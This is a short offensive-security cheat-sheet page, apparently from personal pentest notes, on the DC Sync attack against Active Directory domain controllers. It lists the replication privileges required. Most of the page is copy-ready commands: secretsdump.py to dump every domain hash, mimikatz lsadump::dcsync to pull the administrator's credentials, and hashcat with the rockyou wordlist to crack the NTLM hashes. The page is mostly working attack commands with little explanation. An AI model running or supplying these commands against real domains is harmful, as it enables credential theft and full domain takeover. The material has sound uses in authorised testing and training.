search

DC Sync

Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts

User needs to have the:

-Replicating Directory Changes,

-Replicating Directory Changes All

-Replicating Directory Changes in Filtered

hashtag
Linux

secretsdump.py -outputfile inlanefreight_hashes -just-dc EXAMPLE/[USERNAME]:[PASSWORD]@[IP_ADDRESS]

hashtag
Windows

mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator

hashtag
Cracking

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
PreviousKerberoastingNextSilver Ticket

Last updated